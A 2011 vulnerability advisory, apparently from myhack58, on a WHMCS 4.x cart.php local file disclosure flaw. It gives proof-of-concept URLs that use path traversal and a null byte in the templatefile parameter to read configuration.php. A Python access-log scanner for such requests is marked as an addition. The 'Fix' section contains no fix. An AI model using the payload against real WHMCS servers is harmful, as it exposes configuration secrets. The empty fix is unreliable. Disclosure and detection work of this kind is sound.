WHMCS (cart.php) local file disclosure flaw and fix

2011-12-30T00:00:00
ID MYHACK58:62201132744
Type myhack58
Reporter Anonymous
Modified 2011-12-30T00:00:00

Description

Author: R-t33n

Product: WHMCS

Developer: http://whmcs.com/

Affected version: 4.x.x

Defect type: Remote, webapps

Test platform: Windows 2003, Linux, Ubuntu.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

http://www.badguest.cn/[PATH]/cart.php?a=[wrong value]&templatefile=[File]%00

http://www.badguest.cn/[PATH]/cart.php?a=alb0zz&templatefile=../../../configuration.php%00

Look in the [html] source code of the response for the disclosed file.
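One way to look for this request pattern in web server access logs, as an added example that is not part of the original advisory: it flags cart.php requests whose templatefile parameter contains a NUL byte or path-traversal characters after repeated percent-decoding. The sample log lines, the /billing/ path and the rule that a legitimate template name is a bare identifier are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [30/Dec/2011:10:00:01 +0000] "GET /billing/cart.php?a=add&pid=3 HTTP/1.1" 200 5120
198.51.100.9 - - [30/Dec/2011:10:00:05 +0000] "GET /billing/cart.php?a=x&templatefile=../../../configuration.php%00 HTTP/1.1" 200 812
198.51.100.9 - - [30/Dec/2011:10:00:09 +0000] "GET /billing/cart.php?a=x&templatefile=%252e%252e%252fconfiguration.php%2500 HTTP/1.1" 200 640
198.51.100.4 - - [30/Dec/2011:10:00:12 +0000] "GET /billing/cart.php?a=view&templatefile=viewcart HTTP/1.1" 200 4300
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: a legitimate template name is a bare identifier.
SAFE_NAME_RE = re.compile(r'^[A-Za-z0-9_-]+$')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def classify(value):
    """Return the reasons a templatefile value is suspicious (empty if clean)."""
    v = fully_decode(value)
    reasons = []
    if "\x00" in v:
        reasons.append("nul-byte")
    if ".." in v or "/" in v or "\\" in v:
        reasons.append("path-traversal")
    if not reasons and not SAFE_NAME_RE.match(v):
        reasons.append("unexpected-characters")
    return reasons

def scan(log_text):
    """Return (client_ip, status, reasons) for suspicious cart.php requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        url = urlsplit(m.group(2)) if m else None
        if url is None or not url.path.lower().endswith("/cart.php"):
            continue
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "templatefile" and (reasons := classify(val)):
                hits.append((m.group(1), int(m.group(3)), reasons))
    return hits

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A 200 status on a flagged request only shows the server answered; whether a file was disclosed has to be confirmed from the response body or application logs.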

Fix:

You know